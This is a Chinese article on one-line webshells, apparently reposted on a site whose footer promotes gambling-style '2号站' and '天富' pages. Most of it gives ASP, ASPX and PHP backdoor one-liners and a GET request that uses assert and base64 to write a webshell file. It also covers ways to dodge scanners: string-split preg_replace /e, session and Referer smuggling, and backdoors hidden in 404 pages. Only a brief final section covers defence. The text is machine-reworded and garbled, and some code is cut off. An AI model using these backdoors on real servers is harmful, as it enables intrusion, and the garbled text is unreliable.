主页 > 加入2号站 > 正文
一句话木马原理很简略,造型也很简略,所以形成了它了解起来简略,抵挡起来也简略。所所以非的比赛变成了黑帽不断的结构变形的后门,去荫蔽特征,而白帽则不断的更新过滤办法,建起更高的城墙。
一、原理简述
关于不同的言语有不同的结构办法。
根本结构:最最初结构的是脚本开端的符号
中心部分:获取并履行得到的内容,一般相似eval、execute等
被履行内容:一般是http等协议承受的值,一般相似request、$_POST等
假如咱们经过客户端向服务器发送被履行内容,那么就会让服务器履行咱们发送的脚本,挂马就完成了。
/*asp一句话木马*/<%execute(request("value"))%>
/*php一句话木马*/
/*aspx一句话木马*/
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
黑帽子的意图,便是想尽办法给方针网站刺进这么一段会被储存起来的句子。可所以一个独自的脚本文件文件(.asp 、.php、.aspx ),或者是躲藏在某些网页下的文件、代码等。
其间的value 便是客户端要发送的内容,然后经过客户端与服务器树立衔接,发送操控脚本。也会涉及到一些恣意文件上传缝隙等。
二、简略变形
很明显的 eval 能够成为一个静态特征码,webshell扫描东西能够以此为关键词,扫描到这种木马加以屏蔽。所以能够简略变形不呈现eval:
同理,传给a值为 @base64_decode(base64编码往后的eval)。
运用办法:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
经过对GET恳求的URL结构而构成运用,左括号和右括号是URL编码,解码回来如下:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
PHP接收到GET恳求后相当于履行一个assert函数,并把b作为assert的参数。b里边运用略php的base64解码函数,把部分信息经过base64编码而绕过扫描,解码后如下:
?a=assert&b=${fputs(fopen(c.php,w),1)};
履行后当时目录生成c.php文件并写入一句话木马,这现已算是一个十分荫蔽的木马了。而在PHP 后门的变形之路上,远远不止这些,乃至能够自己界说一个加密解密的函数,或者是运用xor, 字符串翻转,紧缩,切断重组等等办法来绕过。
三、变形改进
1.404页面躲藏木马
Not Found
The requested URL was not found on this server.
一般404页面放好后,很少有人会定时对404页面进行检查和修正。
假如在404页面挂上了一句话后门,一方面不会被发现,另一方面,黑帽子很简略能定位到并衔接上服务器。
2.无特征躲藏PHP后门
运用session:
运用$_SEESION变量来绕过扫描,将$_POST['code']赋值给$_SESSION['theCode'],然后eval履行SESSION的内容。
运用HTTP_REFERER:
运用恳求中的HTTP_REFERER来运转经过base64编码的代码,到达后门的作用,运用两个文件。
$url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
];
curl_setopt_array($ch, $options);
echo curl_exec($ch);
拜访2.php,会结构一个会话,进到后门1.php那里。然后在HTTP_REFERER 的内容也会传递给1.php,经过1.php 履行内容。一般来说,防火墙会对 referer字段宽松一些,就可形成绕过。
3.常见的后门
//菜刀一句话
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//风险的include函数,直接编译任何文件为php格局运转
$filename=$_GET['xbid'];
include ($filename);
//重命名任何文件
$reg="c"."o"."p"."y";
$reg($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']);
//菜刀一句话
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//gif插一句话
//风险的include函数,直接编译任何文件为php格局运转,
POST
include ($uid);
//典型一句话
//运用lanker一句话客户端的专家形式履行相关的php句子
//运用这个后,运用菜刀一句话客户端在装备衔接的时分在"装备"一栏输入
h=@eval_r($_POST1);
//绕过@eval_r($_POST[sb])
四、攻防
攻方:运用各式各样的绕过姿态,都是企图让扫描东西无效。
守方:剖析各式各样的函数,寻觅有用的特征码来避免后门。
黑帽子大牛:深化web结构内核,挖掘出代码缺点,结构出杂乱的后门运用。
安全审计人员:对那些经过GET,POST 获取的超全局变量,进行详尽的追寻,结构适宜的过滤器。
语义剖析:对GET POST 等获取的值进行污染点追寻,以保证这些用户可控的值,不会未经过滤就得到了履行,或是进入数据库中。
针对超全局变量进行语义剖析:
$_GET
$_POST
$_REQUEST
$_SERVER
$_FILES
$_COOKIE
$_SESSION
$_ENV
$GLOBALS
猜你喜欢
- 2024-01-16 11:50:29 天富直属注册_2020年网页设计的6大趋势
- 2024-01-15 11:50:32 陆2号站手机版登_一个好的网页设计能为你赢得什
- 2022-04-20 08:48:47 二号站登录测速_熊掌号指数与排名不是正比关系
- 2021-11-06 08:58:34 天富代理注册_seo网络优化是什么?
- 2021-10-24 08:58:34 二号站登录测速_小明SEO博客的权重2是如何得来的
- 2号站主管Q:2347-660
-
- 01-18天富挂机app下载_打造网站的魔法之旅:网站策划
- 01-18天富手机app挂机_打造完美落地页的10大关键技巧
- 01-18二号站电脑版登录_9种常见的网页设计布局
- 01-17凤凰二号站地址_2020年最值得关注的13个网页设计
- 01-17二号站手机登录_网页设计中最常用的5种配图
- 01-17二号站手机客户端_如何挑选网页设计公司?美橙
- 01-172号站电脑版登陆_如何学习响应式网页设计?
- 01-16天富直属注册_手机网站制作建设中所存在的几个
- 01-16二号站老板_2020年的8大平面&网页设计趋势
- 01-16二号站官网代理注册_手机网页设计我们应该注意
- 01-18天富挂机app下载_打造网站的魔法之旅:网站策划
- 01-18天富手机app挂机_打造完美落地页的10大关键技巧
- 01-18二号站电脑版登录_9种常见的网页设计布局
- 01-17凤凰二号站地址_2020年最值得关注的13个网页设计
- 01-17二号站手机登录_网页设计中最常用的5种配图
- 01-17二号站手机客户端_如何挑选网页设计公司?美橙
- 01-172号站电脑版登陆_如何学习响应式网页设计?
- 01-16天富直属注册_手机网站制作建设中所存在的几个
- 01-16二号站老板_2020年的8大平面&网页设计趋势
- 01-16二号站官网代理注册_手机网页设计我们应该注意